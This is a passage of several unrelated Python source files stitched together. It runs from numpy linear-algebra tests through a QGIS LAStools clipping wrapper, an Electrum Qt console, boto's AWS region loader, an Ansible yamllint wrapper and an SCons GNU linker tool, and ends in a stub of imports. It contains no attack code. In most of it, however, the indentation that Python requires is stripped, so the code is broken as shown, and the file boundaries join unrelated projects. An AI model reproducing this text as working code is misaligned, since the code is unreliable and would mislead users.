d[1] = -6+7j
res = 11.615898132184
old_assert_almost_equal(np.linalg.norm(d, ord=3), res, decimal=10)
d = d.astype(np.complex128)
old_assert_almost_equal(np.linalg.norm(d, ord=3), res, decimal=9)
d = d.astype(np.complex64)
old_assert_almost_equal(np.linalg.norm(d, ord=3), res, decimal=5)
class TestNormDouble(_TestNorm):
dt = np.double
dec = 12
class TestNormSingle(_TestNorm):
dt = np.float32
dec = 6
class TestNormInt64(_TestNorm):
dt = np.int64
dec = 12
class TestMatrixRank(object):
def test_matrix_rank(self):
# Full rank matrix
yield assert_equal, 4, matrix_rank(np.eye(4))
# rank deficient matrix
        I = np.eye(4)
        I[-1, -1] = 0.
yield assert_equal, matrix_rank(I), 3
# All zeros - zero rank
yield assert_equal, matrix_rank(np.zeros((4, 4))), 0
# 1 dimension - rank 1 unless all 0
yield assert_equal, matrix_rank([1, 0, 0, 0]), 1
yield assert_equal, matrix_rank(np.zeros((4,))), 0
# accepts array-like
yield assert_equal, matrix_rank([1]), 1
# greater than 2 dimensions raises error
yield assert_raises, TypeError, matrix_rank, np.zeros((2, 2, 2))
# works on scalar
yield assert_equal, matrix_rank(1), 1
def test_reduced_rank():
# Test matrices with reduced rank
rng = np.random.RandomState(20120714)
for i in range(100):
# Make a rank deficient matrix
X = rng.normal(size=(40, 10))
X[:, 0] = X[:, 1] + X[:, 2]
# Assert that matrix_rank detected deficiency
assert_equal(matrix_rank(X), 9)
X[:, 3] = X[:, 4] + X[:, 5]
assert_equal(matrix_rank(X), 8)
class TestQR(object):
def check_qr(self, a):
# This test expects the argument `a` to be an ndarray or
# a subclass of an ndarray of inexact type.
a_type = type(a)
a_dtype = a.dtype
m, n = a.shape
k = min(m, n)
# mode == 'complete'
q, r = linalg.qr(a, mode='complete')
assert_(q.dtype == a_dtype)
assert_(r.dtype == a_dtype)
assert_(isinstance(q, a_type))
assert_(isinstance(r, a_type))
assert_(q.shape == (m, m))
assert_(r.shape == (m, n))
assert_almost_equal(dot(q, r), a)
assert_almost_equal(dot(q.T.conj(), q), np.eye(m))
assert_almost_equal(np.triu(r), r)
# mode == 'reduced'
q1, r1 = linalg.qr(a, mode='reduced')
assert_(q1.dtype == a_dtype)
assert_(r1.dtype == a_dtype)
assert_(isinstance(q1, a_type))
assert_(isinstance(r1, a_type))
assert_(q1.shape == (m, k))
assert_(r1.shape == (k, n))
assert_almost_equal(dot(q1, r1), a)
assert_almost_equal(dot(q1.T.conj(), q1), np.eye(k))
assert_almost_equal(np.triu(r1), r1)
# mode == 'r'
r2 = linalg.qr(a, mode='r')
assert_(r2.dtype == a_dtype)
assert_(isinstance(r2, a_type))
assert_almost_equal(r2, r1)
def test_qr_empty(self):
a = np.zeros((0, 2))
assert_raises(linalg.LinAlgError, linalg.qr, a)
def test_mode_raw(self):
# The factorization is not unique and varies between libraries,
# so it is not possible to check against known values. Functional
# testing is a possibility, but awaits the exposure of more
# of the functions in lapack_lite. Consequently, this test is
# very limited in scope. Note that the results are in FORTRAN
# order, hence the h arrays are transposed.
a = array([[1, 2], [3, 4], [5, 6]], dtype=np.double)
b = a.astype(np.single)
# Test double
h, tau = linalg.qr(a, mode='raw')
assert_(h.dtype == np.double)
assert_(tau.dtype == np.double)
assert_(h.shape == (2, 3))
assert_(tau.shape == (2,))
h, tau = linalg.qr(a.T, mode='raw')
assert_(h.dtype == np.double)
assert_(tau.dtype == np.double)
assert_(h.shape == (3, 2))
assert_(tau.shape == (2,))
def test_mode_all_but_economic(self):
a = array([[1, 2], [3, 4]])
b = array([[1, 2], [3, 4], [5, 6]])
for dt in "fd":
m1 = a.astype(dt)
m2 = b.astype(dt)
self.check_qr(m1)
self.check_qr(m2)
self.check_qr(m2.T)
self.check_qr(matrix(m1))
for dt in "fd":
m1 = 1 + 1j * a.astype(dt)
m2 = 1 + 1j * b.astype(dt)
self.check_qr(m1)
self.check_qr(m2)
self.check_qr(m2.T)
self.check_qr(matrix(m1))
def test_byteorder_check():
# Byte order check should pass for native order
if sys.byteorder == 'little':
native = '<'
else:
native = '>'
for dtt in (np.float32, np.float64):
arr = np.eye(4, dtype=dtt)
n_arr = arr.newbyteorder(native)
sw_arr = arr.newbyteorder('S').byteswap()
assert_equal(arr.dtype.byteorder, '=')
for routine in (linalg.inv, linalg.det, linalg.pinv):
# Normal call
res = routine(arr)
# Native but not '='
assert_array_equal(res, routine(n_arr))
# Swapped
assert_array_equal(res, routine(sw_arr))
def test_generalized_raise_multiloop():
# It should raise an error even if the error doesn't occur in the
# last iteration of the ufunc inner loop
invertible = np.array([[1, 2], [3, 4]])
non_invertible = np.array([[1, 1], [1, 1]])
x = np.zeros([4, 4, 2, 2])[1::2]
x[...] = invertible
x[0, 0] = non_invertible
assert_raises(np.linalg.LinAlgError, np.linalg.inv, x)
def test_xerbla_override():
# Check that our xerbla has been successfully linked in. If it is not,
# the default xerbla routine is called, which prints a message to stdout
# and may, or may not, abort the process depending on the LAPACK package.
from nose import SkipTest
XERBLA_OK = 255
try:
pid = os.fork()
except (OSError, AttributeError):
# fork failed, or not running on POSIX
raise SkipTest("Not POSIX or fork failed.")
if pid == 0:
# child; close i/o file handles
os.close(1)
os.close(0)
# Avoid producing core files.
import resource
resource.setrlimit(resource.RLIMIT_CORE, (0, 0))
# These calls may abort.
try:
np.linalg.lapack_lite.xerbla()
except ValueError:
pass
except:
os._exit(os.EX_CONFIG)
try:
a = np.array([[1.]])
np.linalg.lapack_lite.dorgqr(
1, 1, 1, a,
0, # <- invalid value
a, a, 0, 0)
except ValueError as e:
if "DORGQR parameter number 5" in str(e):
# success, reuse error code to mark success as
# FORTRAN STOP returns as success.
os._exit(XERBLA_OK)
# Did not abort, but our xerbla was not linked in.
os._exit(os.EX_CONFIG)
else:
# parent
pid, status = os.wait()
if os.WEXITSTATUS(status) != XERBLA_OK:
raise SkipTest('Numpy xerbla not linked in.')
class TestMultiDot(object):
def test_basic_function_with_three_arguments(self):
# multi_dot with three arguments uses a fast hand coded algorithm to
# determine the optimal order. Therefore test it separately.
A = np.random.random((6, 2))
B = np.random.random((2, 6))
C = np.random.random((6, 2))
assert_almost_equal(multi_dot([A, B, C]), A.dot(B).dot(C))
assert_almost_equal(multi_dot([A, B, C]), np.dot(A, np.dot(B, C)))
    def test_basic_function_with_dynamic_programming_optimization(self):
        # multi_dot with four or more arguments uses the dynamic programming
        # optimization and therefore deserves a separate test
A = np.random.random((6, 2))
B = np.random.random((2, 6))
C = np.random.random((6, 2))
D = np.random.random((2, 1))
assert_almost_equal(multi_dot([A, B, C, D]), A.dot(B).dot(C).dot(D))
def test_vector_as_first_argument(self):
# The first argument can be 1-D
A1d = np.random.random(2) # 1-D
B = np.random.random((2, 6))
C = np.random.random((6, 2))
D = np.random.random((2, 2))
# the result should be 1-D
assert_equal(multi_dot([A1d, B, C, D]).shape, (2,))
def test_vector_as_last_argument(self):
# The last argument can be 1-D
A = np.random.random((6, 2))
B = np.random.random((2, 6))
C = np.random.random((6, 2))
D1d = np.random.random(2) # 1-D
# the result should be 1-D
assert_equal(multi_dot([A, B, C, D1d]).shape, (6,))
def test_vector_as_first_and_last_argument(self):
# The first and last arguments can be 1-D
A1d = np.random.random(2) # 1-D
B = np.random.random((2, 6))
C = np.random.random((6, 2))
D1d = np.random.random(2) # 1-D
# the result should be a scalar
assert_equal(multi_dot([A1d, B, C, D1d]).shape, ())
def test_dynamic_programming_logic(self):
# Test for the dynamic programming part
# This test is directly taken from Cormen page 376.
arrays = [np.random.random((30, 35)),
np.random.random((35, 15)),
np.random.random((15, 5)),
np.random.random((5, 10)),
np.random.random((10, 20)),
np.random.random((20, 25))]
m_expected = np.array([[0., 15750., 7875., 9375., 11875., 15125.],
[0., 0., 2625., 4375., 7125., 10500.],
[0., 0., 0., 750., 2500., 5375.],
[0., 0., 0., 0., 1000., 3500.],
[0., 0., 0., 0., 0., 5000.],
[0., 0., 0., 0., 0., 0.]])
s_expected = np.array([[0, 1, 1, 3, 3, 3],
[0, 0, 2, 3, 3, 3],
[0, 0, 0, 3, 3, 3],
[0, 0, 0, 0, 4, 5],
[0, 0, 0, 0, 0, 5],
[0, 0, 0, 0, 0, 0]], dtype=np.int)
s_expected -= 1 # Cormen uses 1-based index, python does not.
s, m = _multi_dot_matrix_chain_order(arrays, return_costs=True)
# Only the upper triangular part (without the diagonal) is interesting.
assert_almost_equal(np.triu(s[:-1, 1:]),
np.triu(s_expected[:-1, 1:]))
assert_almost_equal(np.triu(m), np.triu(m_expected))
def test_too_few_input_arrays(self):
assert_raises(ValueError, multi_dot, [])
assert_raises(ValueError, multi_dot, [np.random.random((3, 3))])
if __name__ == "__main__":
run_module_suite()
|
"""
***************************************************************************
lasclip.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
---------------------
Date : September 2013
Copyright : (C) 2013 by Martin Isenburg
Email : martin near rapidlasso point com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
__revision__ = '$Format:%H$'
import os
from LAStoolsUtils import LAStoolsUtils
from LAStoolsAlgorithm import LAStoolsAlgorithm
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterBoolean
from processing.core.parameters import ParameterNumber
from processing.core.parameters import ParameterSelection
class lasclip(LAStoolsAlgorithm):
POLYGON = "POLYGON"
INTERIOR = "INTERIOR"
OPERATION = "OPERATION"
OPERATIONS = ["clip", "classify"]
CLASSIFY_AS = "CLASSIFY_AS"
def defineCharacteristics(self):
self.name = "lasclip"
self.group = "LAStools"
self.addParametersVerboseGUI()
self.addParametersPointInputGUI()
self.addParameter(ParameterVector(lasclip.POLYGON,
self.tr("Input polygon(s)"), ParameterVector.VECTOR_TYPE_POLYGON))
self.addParameter(ParameterBoolean(lasclip.INTERIOR,
self.tr("interior"), False))
self.addParameter(ParameterSelection(lasclip.OPERATION,
self.tr("what to do with points"), lasclip.OPERATIONS, 0))
self.addParameter(ParameterNumber(lasclip.CLASSIFY_AS,
self.tr("classify as"), 0, None, 12))
self.addParametersPointOutputGUI()
self.addParametersAdditionalGUI()
def processAlgorithm(self, progress):
commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "lasclip")]
self.addParametersVerboseCommands(commands)
self.addParametersPointInputCommands(commands)
poly = self.getParameterValue(lasclip.POLYGON)
if poly is not None:
commands.append("-poly")
commands.append(poly)
if self.getParameterValue(lasclip.INTERIOR):
commands.append("-interior")
operation = self.getParameterValue(lasclip.OPERATION)
if operation != 0:
commands.append("-classify")
classify_as = self.getParameterValue(lasclip.CLASSIFY_AS)
commands.append(str(classify_as))
self.addParametersPointOutputCommands(commands)
self.addParametersAdditionalCommands(commands)
LAStoolsUtils.runLAStools(commands, progress)
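# For reference, a hypothetical command line assembled by processAlgorithm
# (file names and values are illustrative only):
#   <LAStoolsPath>/bin/lasclip -i points.laz -poly area.shp -interior \
#       -classify 12 -o clipped.laz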
|
import sys, os, re
import traceback, platform
from PyQt4 import QtCore
from PyQt4 import QtGui
from electrum import util
if platform.system() == 'Windows':
MONOSPACE_FONT = 'Lucida Console'
elif platform.system() == 'Darwin':
MONOSPACE_FONT = 'Monaco'
else:
MONOSPACE_FONT = 'monospace'
class Console(QtGui.QPlainTextEdit):
def __init__(self, prompt='>> ', startup_message='', parent=None):
QtGui.QPlainTextEdit.__init__(self, parent)
self.prompt = prompt
self.history = []
self.namespace = {}
self.construct = []
self.setGeometry(50, 75, 600, 400)
self.setWordWrapMode(QtGui.QTextOption.WrapAnywhere)
self.setUndoRedoEnabled(False)
self.document().setDefaultFont(QtGui.QFont(MONOSPACE_FONT, 10, QtGui.QFont.Normal))
self.showMessage(startup_message)
self.updateNamespace({'run':self.run_script})
self.set_json(False)
def set_json(self, b):
self.is_json = b
def run_script(self, filename):
with open(filename) as f:
script = f.read()
# eval is generally considered bad practice. use it wisely!
result = eval(script, self.namespace, self.namespace)
def updateNamespace(self, namespace):
self.namespace.update(namespace)
def showMessage(self, message):
self.appendPlainText(message)
self.newPrompt()
def clear(self):
self.setPlainText('')
self.newPrompt()
def newPrompt(self):
if self.construct:
prompt = '.' * len(self.prompt)
else:
prompt = self.prompt
self.completions_pos = self.textCursor().position()
self.completions_visible = False
self.appendPlainText(prompt)
self.moveCursor(QtGui.QTextCursor.End)
def getCommand(self):
doc = self.document()
curr_line = unicode(doc.findBlockByLineNumber(doc.lineCount() - 1).text())
curr_line = curr_line.rstrip()
curr_line = curr_line[len(self.prompt):]
return curr_line
def setCommand(self, command):
if self.getCommand() == command:
return
doc = self.document()
curr_line = unicode(doc.findBlockByLineNumber(doc.lineCount() - 1).text())
self.moveCursor(QtGui.QTextCursor.End)
for i in range(len(curr_line) - len(self.prompt)):
self.moveCursor(QtGui.QTextCursor.Left, QtGui.QTextCursor.KeepAnchor)
self.textCursor().removeSelectedText()
self.textCursor().insertText(command)
self.moveCursor(QtGui.QTextCursor.End)
def show_completions(self, completions):
if self.completions_visible:
self.hide_completions()
c = self.textCursor()
c.setPosition(self.completions_pos)
completions = map(lambda x: x.split('.')[-1], completions)
t = '\n' + ' '.join(completions)
if len(t) > 500:
t = t[:500] + '...'
c.insertText(t)
self.completions_end = c.position()
self.moveCursor(QtGui.QTextCursor.End)
self.completions_visible = True
def hide_completions(self):
if not self.completions_visible:
return
c = self.textCursor()
c.setPosition(self.completions_pos)
l = self.completions_end - self.completions_pos
for x in range(l): c.deleteChar()
self.moveCursor(QtGui.QTextCursor.End)
self.completions_visible = False
def getConstruct(self, command):
if self.construct:
prev_command = self.construct[-1]
self.construct.append(command)
if not prev_command and not command:
ret_val = '\n'.join(self.construct)
self.construct = []
return ret_val
else:
return ''
else:
            if command and command[-1] == ':':
self.construct.append(command)
return ''
else:
return command
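    # Sketch of the accumulation above (the session is illustrative): a line
    # ending in ':' opens a construct, later lines are buffered under a dotted
    # prompt, and the whole block is flushed for execution once two
    # consecutive empty lines have been entered:
    #   >> for i in range(2):
    #   ...    print i
    #   ...
    #   ...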
def getHistory(self):
return self.history
    def setHistory(self, history):
self.history = history
def addToHistory(self, command):
if command[0:1] == ' ':
return
if command and (not self.history or self.history[-1] != command):
self.history.append(command)
self.history_index = len(self.history)
def getPrevHistoryEntry(self):
if self.history:
self.history_index = max(0, self.history_index - 1)
return self.history[self.history_index]
return ''
def getNextHistoryEntry(self):
if self.history:
hist_len = len(self.history)
self.history_index = min(hist_len, self.history_index + 1)
if self.history_index < hist_len:
return self.history[self.history_index]
return ''
def getCursorPosition(self):
c = self.textCursor()
return c.position() - c.block().position() - len(self.prompt)
def setCursorPosition(self, position):
self.moveCursor(QtGui.QTextCursor.StartOfLine)
for i in range(len(self.prompt) + position):
self.moveCursor(QtGui.QTextCursor.Right)
def register_command(self, c, func):
methods = { c: func}
self.updateNamespace(methods)
def runCommand(self):
command = self.getCommand()
self.addToHistory(command)
command = self.getConstruct(command)
if command:
tmp_stdout = sys.stdout
class stdoutProxy():
def __init__(self, write_func):
self.write_func = write_func
self.skip = False
def flush(self):
pass
def write(self, text):
if not self.skip:
stripped_text = text.rstrip('\n')
self.write_func(stripped_text)
QtCore.QCoreApplication.processEvents()
self.skip = not self.skip
if type(self.namespace.get(command)) == type(lambda:None):
self.appendPlainText("'%s' is a function. Type '%s()' to use it in the Python console."%(command, command))
self.newPrompt()
return
sys.stdout = stdoutProxy(self.appendPlainText)
try:
try:
# eval is generally considered bad practice. use it wisely!
result = eval(command, self.namespace, self.namespace)
                    if result is not None:
if self.is_json:
util.print_json(result)
else:
self.appendPlainText(repr(result))
except SyntaxError:
# exec is generally considered bad practice. use it wisely!
exec command in self.namespace
except SystemExit:
self.close()
except Exception:
traceback_lines = traceback.format_exc().split('\n')
# Remove traceback mentioning this file, and a linebreak
for i in (3,2,1,-1):
traceback_lines.pop(i)
self.appendPlainText('\n'.join(traceback_lines))
sys.stdout = tmp_stdout
self.newPrompt()
self.set_json(False)
def keyPressEvent(self, event):
if event.key() == QtCore.Qt.Key_Tab:
self.completions()
return
self.hide_completions()
if event.key() in (QtCore.Qt.Key_Enter, QtCore.Qt.Key_Return):
self.runCommand()
return
if event.key() == QtCore.Qt.Key_Home:
self.setCursorPosition(0)
return
if event.key() == QtCore.Qt.Key_PageUp:
return
elif event.key() in (QtCore.Qt.Key_Left, QtCore.Qt.Key_Backspace):
if self.getCursorPosition() == 0:
return
elif event.key() == QtCore.Qt.Key_Up:
self.setCommand(self.getPrevHistoryEntry())
return
elif event.key() == QtCore.Qt.Key_Down:
self.setCommand(self.getNextHistoryEntry())
return
elif event.key() == QtCore.Qt.Key_L and event.modifiers() == QtCore.Qt.ControlModifier:
self.clear()
super(Console, self).keyPressEvent(event)
def completions(self):
cmd = self.getCommand()
lastword = re.split(' |\(|\)',cmd)[-1]
beginning = cmd[0:-len(lastword)]
path = lastword.split('.')
ns = self.namespace.keys()
if len(path) == 1:
ns = ns
prefix = ''
else:
obj = self.namespace.get(path[0])
prefix = path[0] + '.'
ns = dir(obj)
completions = []
for x in ns:
            if x[0] == '_':
                continue
xx = prefix + x
if xx.startswith(lastword):
completions.append(xx)
completions.sort()
if not completions:
self.hide_completions()
elif len(completions) == 1:
self.hide_completions()
self.setCommand(beginning + completions[0])
else:
# find common prefix
p = os.path.commonprefix(completions)
if len(p)>len(lastword):
self.hide_completions()
self.setCommand(beginning + p)
else:
self.show_completions(completions)
welcome_message = '''
---------------------------------------------------------------
Welcome to a primitive Python interpreter.
---------------------------------------------------------------
'''
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
console = Console(startup_message=welcome_message)
    console.updateNamespace({'myVar1': app, 'myVar2': 1234})
    console.show()
sys.exit(app.exec_())
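# A hedged usage sketch for register_command (the names below are hypothetical):
# registering a callable exposes it to the interactive prompt via the console
# namespace, so typing ``greet()`` at the prompt evaluates it in runCommand().
#
#   def greet(name='world'):
#       return 'hello %s' % name
#   console.register_command('greet', greet)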
|
from __future__ import with_statement
import os
import boto
from boto.compat import json
from boto.exception import BotoClientError
def load_endpoint_json(path):
"""
Loads a given JSON file & returns it.
:param path: The path to the JSON file
:type path: string
:returns: The loaded data
"""
with open(path, 'r') as endpoints_file:
return json.load(endpoints_file)
def merge_endpoints(defaults, additions):
"""
Given an existing set of endpoint data, this will deep-update it with
any similarly structured data in the additions.
:param defaults: The existing endpoints data
:type defaults: dict
    :param additions: The additional endpoints data
    :type additions: dict
:returns: The modified endpoints data
:rtype: dict
"""
    # We can't just do a ``defaults.update(...)`` here, as that could
# *overwrite* regions if present in both.
# We'll iterate instead, essentially doing a deeper merge.
for service, region_info in additions.items():
# Set the default, if not present, to an empty dict.
defaults.setdefault(service, {})
defaults[service].update(region_info)
return defaults
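# A minimal sketch of the merge semantics (hypothetical data, not real
# endpoints): regions are merged per-service rather than replaced wholesale.
#
#   defaults = {'ec2': {'us-east-1': 'ec2.us-east-1.amazonaws.com'}}
#   additions = {'ec2': {'xx-test-1': 'ec2.xx-test-1.example.com'}}
#   merged = merge_endpoints(defaults, additions)
#   # merged['ec2'] now contains both 'us-east-1' and 'xx-test-1'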
def load_regions():
"""
Actually load the region/endpoint information from the JSON files.
By default, this loads from the default included ``boto/endpoints.json``
file.
Users can override/extend this by supplying either a ``BOTO_ENDPOINTS``
    environment variable or an ``endpoints_path`` config variable, either of
which should be an absolute path to the user's JSON file.
:returns: The endpoints data
:rtype: dict
"""
# Load the defaults first.
endpoints = load_endpoint_json(boto.ENDPOINTS_PATH)
additional_path = None
# Try the ENV var. If not, check the config file.
if os.environ.get('BOTO_ENDPOINTS'):
additional_path = os.environ['BOTO_ENDPOINTS']
elif boto.config.get('boto', 'endpoints_path'):
additional_path = boto.config.get('boto', 'endpoints_path')
# If there's a file provided, we'll load it & additively merge it into
# the endpoints.
if additional_path:
additional = load_endpoint_json(additional_path)
endpoints = merge_endpoints(endpoints, additional)
return endpoints
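# Hedged usage sketch: pointing ``BOTO_ENDPOINTS`` at a user file (the path
# below is hypothetical) merges its contents over the bundled defaults.
#
#   os.environ['BOTO_ENDPOINTS'] = '/etc/boto/my_endpoints.json'
#   endpoints = load_regions()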
def get_regions(service_name, region_cls=None, connection_cls=None):
"""
Given a service name (like ``ec2``), returns a list of ``RegionInfo``
objects for that service.
This leverages the ``endpoints.json`` file (+ optional user overrides) to
configure/construct all the objects.
:param service_name: The name of the service to construct the ``RegionInfo``
objects for. Ex: ``ec2``, ``s3``, ``sns``, etc.
:type service_name: string
:param region_cls: (Optional) The class to use when constructing. By
default, this is ``RegionInfo``.
:type region_cls: class
:param connection_cls: (Optional) The connection class for the
``RegionInfo`` object. Providing this allows the ``connect`` method on
the ``RegionInfo`` to work. Default is ``None`` (no connection).
:type connection_cls: class
:returns: A list of configured ``RegionInfo`` objects
:rtype: list
"""
endpoints = load_regions()
    if service_name not in endpoints:
raise BotoClientError(
"Service '%s' not found in endpoints." % service_name
)
if region_cls is None:
region_cls = RegionInfo
region_objs = []
for region_name, endpoint in endpoints.get(service_name, {}).items():
region_objs.append(
region_cls(
name=region_name,
endpoint=endpoint,
connection_cls=connection_cls
)
)
return region_objs
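# Hedged usage sketch (kept as a comment to avoid a circular import at module
# load; the credentials are placeholders):
#
#   from boto.ec2.connection import EC2Connection
#   regions = get_regions('ec2', connection_cls=EC2Connection)
#   conn = regions[0].connect(aws_access_key_id='...', aws_secret_access_key='...')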
class RegionInfo(object):
"""
Represents an AWS Region
"""
def __init__(self, connection=None, name=None, endpoint=None,
connection_cls=None):
self.connection = connection
self.name = name
self.endpoint = endpoint
self.connection_cls = connection_cls
def __repr__(self):
return 'RegionInfo:%s' % self.name
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'regionName':
self.name = value
elif name == 'regionEndpoint':
self.endpoint = value
else:
setattr(self, name, value)
def connect(self, **kw_params):
"""
        Connect to this Region's endpoint. Returns a connection
object pointing to the endpoint associated with this region.
You may pass any of the arguments accepted by the connection
class's constructor as keyword arguments and they will be
passed along to the connection object.
:rtype: Connection object
        :return: The connection to this region's endpoint
"""
if self.connection_cls:
return self.connection_cls(region=self, **kw_params)
|
"""Wrapper around yamllint that supports YAML embedded in Ansible modules."""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import ast
import json
import os
import re
import sys
import typing as t
import yaml
from yaml.resolver import Resolver
from yaml.constructor import SafeConstructor
from yaml.error import MarkedYAMLError
from _yaml import CParser # pylint: disable=no-name-in-module
from yamllint import linter
from yamllint.config import YamlLintConfig
def main():
"""Main program body."""
paths = sys.argv[1:] or sys.stdin.read().splitlines()
checker = YamlChecker()
checker.check(paths)
checker.report()
class TestConstructor(SafeConstructor):
"""Yaml Safe Constructor that knows about Ansible tags."""
def construct_yaml_unsafe(self, node):
"""Construct an unsafe tag."""
try:
constructor = getattr(node, 'id', 'object')
if constructor is not None:
constructor = getattr(self, 'construct_%s' % constructor)
except AttributeError:
constructor = self.construct_object
value = constructor(node)
return value
TestConstructor.add_constructor(
u'!unsafe',
TestConstructor.construct_yaml_unsafe)
TestConstructor.add_constructor(
u'!vault',
TestConstructor.construct_yaml_str)
TestConstructor.add_constructor(
u'!vault-encrypted',
TestConstructor.construct_yaml_str)
class TestLoader(CParser, TestConstructor, Resolver):
"""Custom YAML loader that recognizes custom Ansible tags."""
def __init__(self, stream):
CParser.__init__(self, stream)
TestConstructor.__init__(self)
Resolver.__init__(self)
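# Hedged sketch of what the custom tags buy us: with TestLoader, documents that
# use Ansible-specific tags parse instead of erroring out (illustrative input):
#
#   data = yaml.load('msg: !unsafe "{{ var }}"', Loader=TestLoader)
#   # data['msg'] is the raw string; a stock SafeLoader would reject the tag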
class YamlChecker:
"""Wrapper around yamllint that supports YAML embedded in Ansible modules."""
def __init__(self):
self.messages = []
def report(self):
"""Print yamllint report to stdout."""
report = dict(
messages=self.messages,
)
print(json.dumps(report, indent=4, sort_keys=True))
def check(self, paths): # type: (t.List[str]) -> None
"""Check the specified paths."""
config_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'config')
yaml_conf = YamlLintConfig(file=os.path.join(config_path, 'default.yml'))
module_conf = YamlLintConfig(file=os.path.join(config_path, 'modules.yml'))
plugin_conf = YamlLintConfig(file=os.path.join(config_path, 'plugins.yml'))
for path in paths:
extension = os.path.splitext(path)[1]
with open(path) as file:
contents = file.read()
if extension in ('.yml', '.yaml'):
self.check_yaml(yaml_conf, path, contents)
elif extension == '.py':
if path.startswith('lib/ansible/modules/') or path.startswith('plugins/modules/'):
conf = module_conf
else:
conf = plugin_conf
self.check_module(conf, path, contents)
else:
raise Exception('unsupported extension: %s' % extension)
def check_yaml(self, conf, path, contents): # type: (YamlLintConfig, str, str) -> None
"""Check the given YAML."""
self.check_parsable(path, contents)
self.messages += [self.result_to_message(r, path) for r in linter.run(contents, conf, path)]
def check_module(self, conf, path, contents): # type: (YamlLintConfig, str, str) -> None
"""Check the given module."""
docs = self.get_module_docs(path, contents)
for key, value in docs.items():
yaml_data = value['yaml']
lineno = value['lineno']
fmt = value['fmt']
if fmt != 'yaml':
continue
if yaml_data.startswith('\n'):
yaml_data = yaml_data[1:]
lineno += 1
self.check_parsable(path, yaml_data, lineno)
messages = list(linter.run(yaml_data, conf, path))
self.messages += [self.result_to_message(r, path, lineno - 1, key) for r in messages]
def check_parsable(self, path, contents, lineno=1): # type: (str, str, int) -> None
"""Check the given contents to verify they can be parsed as YAML."""
try:
yaml.load(contents, Loader=TestLoader)
except MarkedYAMLError as ex:
self.messages += [{'code': 'unparsable-with-libyaml',
'message': '%s - %s' % (ex.args[0], ex.args[2]),
'path': path,
'line': ex.problem_mark.line + lineno,
'column': ex.problem_mark.column + 1,
'level': 'error',
}]
@staticmethod
def result_to_message(result, path, line_offset=0, prefix=''): # type: (t.Any, str, int, str) -> t.Dict[str, t.Any]
"""Convert the given result to a dictionary and return it."""
if prefix:
prefix = '%s: ' % prefix
return dict(
code=result.rule or result.level,
message=prefix + result.desc,
path=path,
line=result.line + line_offset,
column=result.column,
level=result.level,
)
def get_module_docs(self, path, contents): # type: (str, str) -> t.Dict[str, t.Any]
"""Return the module documentation for the given module contents."""
module_doc_types = [
'DOCUMENTATION',
'EXAMPLES',
'RETURN',
]
docs = {}
fmt_re = re.compile(r'^# fmt:\s+(\S+)')
def check_assignment(statement, doc_types=None):
"""Check the given statement for a documentation assignment."""
for target in statement.targets:
if not isinstance(target, ast.Name):
continue
if doc_types and target.id not in doc_types:
continue
fmt_match = fmt_re.match(statement.value.s.lstrip())
fmt = 'yaml'
if fmt_match:
fmt = fmt_match.group(1)
docs[target.id] = dict(
yaml=statement.value.s,
lineno=statement.lineno,
end_lineno=statement.lineno + len(statement.value.s.splitlines()),
fmt=fmt.lower(),
)
module_ast = self.parse_module(path, contents)
if not module_ast:
return {}
is_plugin = path.startswith('lib/ansible/modules/') or path.startswith('lib/ansible/plugins/') or path.startswith('plugins/')
is_doc_fragment = path.startswith('lib/ansible/plugins/doc_fragments/') or path.startswith('plugins/doc_fragments/')
if is_plugin and not is_doc_fragment:
for body_statement in module_ast.body:
if isinstance(body_statement, ast.Assign):
check_assignment(body_statement, module_doc_types)
elif is_doc_fragment:
for body_statement in module_ast.body:
if isinstance(body_statement, ast.ClassDef):
for class_statement in body_statement.body:
if isinstance(class_statement, ast.Assign):
check_assignment(class_statement)
else:
raise Exception('unsupported path: %s' % path)
return docs
def parse_module(self, path, contents): # type: (str, str) -> t.Optional[ast.Module]
"""Parse the given contents and return a module if successful, otherwise return None."""
try:
return ast.parse(contents)
except SyntaxError as ex:
self.messages.append(dict(
code='python-syntax-error',
message=str(ex),
path=path,
line=ex.lineno,
column=ex.offset,
level='error',
))
except Exception as ex: # pylint: disable=broad-except
self.messages.append(dict(
code='python-parse-error',
message=str(ex),
path=path,
line=0,
column=0,
level='error',
))
return None
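# Hedged usage sketch (the paths are hypothetical; check() raises on extensions
# other than .yml/.yaml/.py):
#
#   checker = YamlChecker()
#   checker.check(['plugins/modules/my_module.py', 'meta/runtime.yml'])
#   checker.report()  # JSON report of yamllint messages on stdout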
if __name__ == '__main__':
main()
|
"""SCons.Tool.gnulink
Tool-specific initialization for the gnu linker.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
__revision__ = "src/engine/SCons/Tool/gnulink.py 2014/09/27 12:51:43 garyo"
import SCons.Tool  # provides FindTool(), used by exists() below
import SCons.Util
import link
def generate(env):
"""Add Builders and construction variables for gnulink to an Environment."""
link.generate(env)
if env['PLATFORM'] == 'hpux':
env['SHLINKFLAGS'] = SCons.Util.CLVar('$LINKFLAGS -shared -fPIC')
# __RPATH is set to $_RPATH in the platform specification if that
# platform supports it.
env['RPATHPREFIX'] = '-Wl,-rpath='
env['RPATHSUFFIX'] = ''
env['_RPATH'] = '${_concat(RPATHPREFIX, RPATH, RPATHSUFFIX, __env__)}'
def exists(env):
    """Return the name of a usable GNU linker tool, or None if none is found."""
    # TODO: sync with link.smart_link() to choose a linker
linkers = { 'CXX': ['g++'], 'CC': ['gcc'] }
alltools = []
for langvar, linktools in linkers.items():
if langvar in env: # use CC over CXX when user specified CC but not CXX
return SCons.Tool.FindTool(linktools, env)
alltools.extend(linktools)
return SCons.Tool.FindTool(alltools, env) # find CXX or CC
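# Hedged usage sketch (SConstruct snippet; the flags shown follow the
# construction variables set in generate() above):
#
#   env = Environment(tools=['default', 'gnulink'], RPATH=['/usr/local/lib'])
#   env.SharedLibrary('demo', ['demo.c'])  # links with -Wl,-rpath=/usr/local/lib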
|
import logging
import pprint
import werkzeug
